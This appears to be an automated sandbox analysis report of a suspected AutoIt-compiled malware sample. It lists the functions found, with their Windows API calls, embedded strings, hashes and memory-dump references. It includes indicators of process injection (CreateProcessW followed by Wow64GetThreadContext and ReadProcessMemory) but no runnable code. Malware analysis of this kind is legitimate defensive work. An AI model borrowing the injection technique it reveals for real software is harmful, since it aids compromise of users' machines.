Instruction ID: 735722f6e014cea5cce48c1ca2f08acb82be24c8851364187260342f334e3190
Opcode Fuzzy Hash: a711a239af82cf5ec917fdc3e3225e25557e97a77bac66c4b016a61429e4061e
Instruction Fuzzy Hash: CC51D470D04299EAEF11DBA4D819BEFBBB5AF05704F044198E2087B2C1C7B94B44DBA5

Function 005D407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0060D3D7

Part of subcall function 005D7BCC: _memmove.LIBCMT ref: 005D7C06

_memset.LIBCMT ref: 005D40FC
_wcscpy.LIBCMT ref: 005D4150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005D4160

Strings

Line: , xrefs: 0060D400

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: b287a6f52a7d240731dcbc935fd75d6a5a3f719303afc324cb21b6b523c4dda9
Instruction ID: ac1386b3887fe015f173971ecca8b8774ea56d1823742e36c1b8cdfd83c23e3c
Opcode Fuzzy Hash: b287a6f52a7d240731dcbc935fd75d6a5a3f719303afc324cb21b6b523c4dda9
Instruction Fuzzy Hash: 56318F71008706AFD735EB68DC49BEB7BDCBF84310F10491BF685962A1EB709648CB92

Function 005F541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 005F547B
_memcpy_s.LIBCMT ref: 005F54ED
__read_nolock.LIBCMT ref: 005F554B
__filbuf.LIBCMT ref: 005F556E
_memset.LIBCMT ref: 005F55B2

Part of subcall function 005F8B28: __getptd_noexit.LIBCMT ref: 005F8B28

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction ID: 9447fbaed4caca72bd78aeed622e9fb38b47fced632f39cb5ec8205b14d7b1aa
Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction Fuzzy Hash: EB51D570A00B0DDBDF249FA9D84467E7FA2BF40321F248729FB25962D0E7789D518B40

Function 005D686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 005D4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,006952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 005D4E0F

_free.LIBCMT ref: 0060E263
_free.LIBCMT ref: 0060E2AA

Part of subcall function 005D6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 005D6BAD

Strings

Bad directive syntax error, xrefs: 0060E292
>>>AUTOIT SCRIPT<<<, xrefs: 0060E039

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: b0c5151ade7070276dc26912fe9ffdea47abb30bde2d5db87951a7d4f46aa0b3
Instruction ID: 22e692ad39552f35baba1cbaf81a4329191d4bbd3a4606ac9aa670f93e61461a
Opcode Fuzzy Hash: b0c5151ade7070276dc26912fe9ffdea47abb30bde2d5db87951a7d4f46aa0b3
Instruction Fuzzy Hash: C891937194022AEFCF18EF64C8458EEBBBAFF14310F00446AF816AB3A1DB759915CB50

Function 005D35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,005D35A1,SwapMouseButtons,00000004,?), ref: 005D35D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,005D35A1,SwapMouseButtons,00000004,?,?,?,?,005D2754), ref: 005D35F5
RegCloseKey.KERNELBASE(00000000,?,?,005D35A1,SwapMouseButtons,00000004,?,?,?,?,005D2754), ref: 005D3617

Strings

Control Panel\Mouse, xrefs: 005D35D2

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: f217cf74f49723e10c748a8054145d6127a38a0cde8d768accb56f2779c99e8f
Instruction ID: dba57c62c7df32cbad2aaa687792cda0ed51a3c378df65f0ccda074e9e7b67dc
Opcode Fuzzy Hash: f217cf74f49723e10c748a8054145d6127a38a0cde8d768accb56f2779c99e8f
Instruction Fuzzy Hash: 51113375611208BADB20CF68DC80EAABBA9EF04740F00946AA805D7210E2719E40DBA1

Function 00F24300 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00F24ABB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F24B51
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F24B73

Memory Dump Source

Source File: 00000000.00000002.1456569915.0000000000F23000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F23000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f23000_M7XS5C07kV.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
Instruction ID: f17cdfa9cb770f355024f37529316d8d9270879cf33638c3a6bc6ddbe41fb045
Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
Instruction Fuzzy Hash: BB620930A14658DBEB24CFA4D850BDEB376FF58300F1091A9D10DEB290E7B99E81DB59

Function 0063955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 005D4EE5: _fseek.LIBCMT ref: 005D4EFD

Part of subcall function 00639734: _wcscmp.LIBCMT ref: 00639824
Part of subcall function 00639734: _wcscmp.LIBCMT ref: 00639837

_free.LIBCMT ref: 006396A2
_free.LIBCMT ref: 006396A9
_free.LIBCMT ref: 00639714

Part of subcall function 005F2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,005F9A24), ref: 005F2D69
Part of subcall function 005F2D55: GetLastError.KERNEL32(00000000,?,005F9A24), ref: 005F2D7B

_free.LIBCMT ref: 0063971C

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: 7d2e8743c1f49b1cf0ea7a148e74597291d1a3efc4683892ce0256300fa6714f
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: D3513DB1D04259AFDF249F64CC85AAEBB79FF88300F10449EB609A3351DB715A81CF58

Function 005F470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005F47A0
__flush.LIBCMT ref: 005F47C0
__write.LIBCMT ref: 005F47F3
__flsbuf.LIBCMT ref: 005F4821

Part of subcall function 005F8B28: __getptd_noexit.LIBCMT ref: 005F8B28

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 1d96feca9ba585a0dea4dccc77abdce149bdf0b6f3dd13d3a19164f1b324cd26
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 8841D374A0174E9BDB189EA9C8849BF7FA6FF823A0B24853DEA15C7640D778DD418F40

Function 005D4C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005D4CBA

Strings

EA06, xrefs: 0060D8CC
AU3!P/f, xrefs: 005D4CB4

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/f$EA06
API String ID: 4104443479-2229653743
Opcode ID: 30842b47c90c50675d991abeab36c26648b6daaf2aae42f6c7bf82bcf8a679fd
Instruction ID: 10ec7138a5ece055a9c7a4cec640279db786e8ff3f02997ee4a5d9fec8d89bba
Opcode Fuzzy Hash: 30842b47c90c50675d991abeab36c26648b6daaf2aae42f6c7bf82bcf8a679fd
Instruction Fuzzy Hash: 61413B21A041596BDF31AB5C88957BE7FA7FB85300F684477E886DB382D6309D448FA2

Function 005D7285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0060EA39
GetOpenFileNameW.COMDLG32(?), ref: 0060EA83

Part of subcall function 005D4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005D4743,?,?,005D37AE,?), ref: 005D4770

Part of subcall function 005F0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005F07B0

Strings

X, xrefs: 0060EA51

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 6e4fe7a2b51bcfd641b07a4de56bd3f833cbe567e972624e0d980f8125aec860
Instruction ID: e94ca5cb9758cef5e4d97dd3c082f106530807acf2699bd6d8d0199b19fd1f96
Opcode Fuzzy Hash: 6e4fe7a2b51bcfd641b07a4de56bd3f833cbe567e972624e0d980f8125aec860
Instruction Fuzzy Hash: 3321A470A002589BCB51DF98C849BEE7FF9AF49310F00405BE508A7381DBB45A898F91

Function 00638D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00638DAC
__fread_nolock.LIBCMT ref: 00638DC1

Strings

EA06, xrefs: 00638DF3

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 0966f0ea9804564ad23d9e0f91cb5edc4ab417b864740b9e65f7d97c8a6b6404
Instruction ID: 2ae41c2b520a0531d57efca52b87d0988026f08c76da122aa8931584b94afd41
Opcode Fuzzy Hash: 0966f0ea9804564ad23d9e0f91cb5edc4ab417b864740b9e65f7d97c8a6b6404
Instruction Fuzzy Hash: F101B971D042187EDB28DAA8CC5AEFE7FF8DF15311F00459AF652D6181E979E60487A0

Function 006398E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 006398F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0063990F

Strings

aut, xrefs: 00639909

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 50e4e1c055e3303a706a203676a9099a3310cd8aa9540eca5fc5130b8674d675
Instruction ID: 14c69c60712398bb4a77d49506bf8c3d51fee123478c1c86b0929203427e2c63
Opcode Fuzzy Hash: 50e4e1c055e3303a706a203676a9099a3310cd8aa9540eca5fc5130b8674d675
Instruction Fuzzy Hash: FFD05EB958030DABDB50EBE0DC0EF9A773DE704701F4002B1BA94960A1EAB096988B91

Function 0064CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00eb1764463a4220977f161e4781640b04849b7ba72d6430753ff9249de49a6f
Instruction ID: a3e04c49724d88b9fcc9a2ba78abc1a7179ba5e405b0bcd451fb7faf8a24a61e
Opcode Fuzzy Hash: 00eb1764463a4220977f161e4781640b04849b7ba72d6430753ff9249de49a6f
Instruction Fuzzy Hash: B4F13A71A083419FC754DF28C484A6ABBE6FF89324F14892EF8999B351D734E945CF82

Function 005D434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005D4370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 005D4415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 005D4432

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 01fd84d931d1bc157397d2600c92359d83fbb54a97e9f3adbb5b0e912aaae0d4
Instruction ID: 70930917302634e7a6043bbcb362c6f98a750d3c3f170f935158987394188b75
Opcode Fuzzy Hash: 01fd84d931d1bc157397d2600c92359d83fbb54a97e9f3adbb5b0e912aaae0d4
Instruction Fuzzy Hash: CF3150B05047019FDB31DF68D88569BBBE8FB48309F000D2FE69A86351D771A984CB92

Function 005F571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 005F5733

Part of subcall function 005FA16B: __NMSG_WRITE.LIBCMT ref: 005FA192
Part of subcall function 005FA16B: __NMSG_WRITE.LIBCMT ref: 005FA19C

__NMSG_WRITE.LIBCMT ref: 005F573A

Part of subcall function 005FA1C8: GetModuleFileNameW.KERNEL32(00000000,006933BA,00000104,?,00000001,00000000), ref: 005FA25A
Part of subcall function 005FA1C8: ___crtMessageBoxW.LIBCMT ref: 005FA308

Part of subcall function 005F309F: ___crtCorExitProcess.LIBCMT ref: 005F30A5
Part of subcall function 005F309F: ExitProcess.KERNEL32 ref: 005F30AE

Part of subcall function 005F8B28: __getptd_noexit.LIBCMT ref: 005F8B28

RtlAllocateHeap.NTDLL(00EA0000,00000000,00000001,00000000,?,?,?,005F0DD3,?), ref: 005F575F

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 7f44d712d35682055e9a1a6278c125b3c3a1f3186881718e078a178e5e5d0ea9
Instruction ID: 14148be1302877d1cbec7591472de98ad95d0b95b7e4b514c570cb2533012d42
Opcode Fuzzy Hash: 7f44d712d35682055e9a1a6278c125b3c3a1f3186881718e078a178e5e5d0ea9
Instruction Fuzzy Hash: DB01D235302B1ADAE7117B34EC4AB3E6F49FBC23A2F110426F7059A2C1EE7C99008661

Function 006398A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00639548,?,?,?,?,?,00000004), ref: 006398BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00639548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 006398D1
CloseHandle.KERNEL32(00000000,?,00639548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006398D8

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 0d1ab77e903140c6db7a61fec9ec5dbe8343b7d2a9d93547ae0d888715bb73fc
Instruction ID: a542724db70b4e114f2ea5563ab0a83794af50e6b809f582c00176be6b20b76c
Opcode Fuzzy Hash: 0d1ab77e903140c6db7a61fec9ec5dbe8343b7d2a9d93547ae0d888715bb73fc
Instruction Fuzzy Hash: 00E08632141714B7E7316B54EC09FCA7B1AAF06761F104120FB14A91E087B1151197D8

Function 00638D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00638D1B

Part of subcall function 005F2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,005F9A24), ref: 005F2D69
Part of subcall function 005F2D55: GetLastError.KERNEL32(00000000,?,005F9A24), ref: 005F2D7B

_free.LIBCMT ref: 00638D2C
_free.LIBCMT ref: 00638D3E

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: 01a6a7318308f2775ffd22b89d171b6be4f12e9e84a5d8088126d7b90170ace3
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: 6AE012E160170A4ACB24A678AD45AE317DD5FD8352F14091DB50DD7286CE68FC438164

Function 005DA9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0060FC01

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: c82aa9e48c4d4c945a14e18ff89a8a07139d855b28ea86d644c21f4a8b4dfbbd
Instruction ID: 4f059d93df2ac20ceb95d8bc7a095b46e1b2e6cb683ee75619de766fd1ca4825
Opcode Fuzzy Hash: c82aa9e48c4d4c945a14e18ff89a8a07139d855b28ea86d644c21f4a8b4dfbbd
Instruction Fuzzy Hash: 23223974508241DFDB24DF18C454A6ABBE2BF84314F19895FF88A8B362D735ED85CB82

Function 005D5C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,005D5821,?,?,?,?), ref: 005D5CC7
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,005D5821,?,?,?,?), ref: 0060DD73

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
